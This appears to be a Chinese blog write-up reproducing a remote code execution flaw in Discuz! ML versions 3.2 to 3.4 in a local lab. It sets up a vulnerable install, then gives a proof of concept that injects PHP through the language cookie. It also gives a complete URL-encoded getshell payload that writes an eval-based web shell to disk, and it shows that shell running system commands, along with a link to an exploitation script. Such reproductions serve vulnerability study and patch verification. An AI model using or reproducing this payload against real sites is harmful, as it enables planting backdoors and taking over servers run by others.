discuz安装_Discuz! ML RCE漏洞 getshell 复现

0x00 影响版本

Discuz!ML是一个由http://CodersClub.org创建的多语言,集成,功能齐全的开源网络平台, 用于构建像“社交网络”这样的互联网社区,漏洞版本如下:

Discuz! ML V3.2

Discuz! ML V3.3

Discuz! ML V3.4

0x01 环境搭建

使用phpstudy搭建:直接官网下载即可http://discuz.ml/download,将压缩包解压至phpstudy网站根目录,浏览器访问upload目录即可开始安装

320b412d147b821d578478227883fd29.png

之后就是傻瓜式操作,一直点击下一步就可以了,直到完成安装

0x02 漏洞Poc

随便选择一种语言并抓包

ec008f4168ad4464be96d309d3e82cc1.png

将Cookie中的xxxxx_language参数值改为 '.phpinfo().' ,可以看到成功执行了代码,如下图:

5cdc67c1b3c1747d18c412a3f555f09b.png

0x03 Getshell

EXP:

%27.+file_put_contents%28%27shell.php%27%2Curldecode%28%27%253c%253fphp+%2520eval%28%2524_%2547%2545%2554%255b%2522cmd%2522%255d%29%253b%253f%253e%27%29%29.%27

编码前是这样的:(urldecode后面的括号里是一句话木马)

'.+file_put_contents('shell.php',urldecode('%3c%3fphp+%20eval(%24_%47%45%54%5b%22cmd%22%5d)%3b%3f%3e')).'

传入xxxx_language发包:

44f9f4baec67ad4ce2af3d6c67e693aa.png

执行后本地就会多出一个shell.php文件

31f9c2ca6019cfed30f667efcc78dbc7.png

访问:

http://127.0.0.1/discuzml/upload/shell.php?cmd=system('whoami');

即可看到成功执行了命令

e1ff8dbd6f06ed10dfc20d48380c9489.png

检测及利用脚本:

https://github.com/theLSA/discuz-ml-rce

参考链接:

https://mp.weixin.qq.com/s/B5K9gr7Hhu7PlHk_H5WK2g

欢迎关注团队公众号:Timeline Sec

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值